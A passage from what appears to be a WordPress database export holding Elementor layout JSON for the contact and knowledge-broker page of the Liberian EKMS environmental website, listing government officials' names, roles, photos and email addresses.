\\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23374,3396,'_elementor_edit_mode','builder'),(23375,3396,'_elementor_template_type','wp-page'),(23376,3396,'_elementor_version','3.0.16'),(23377,3396,'_wp_page_template','default'),(23378,3396,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 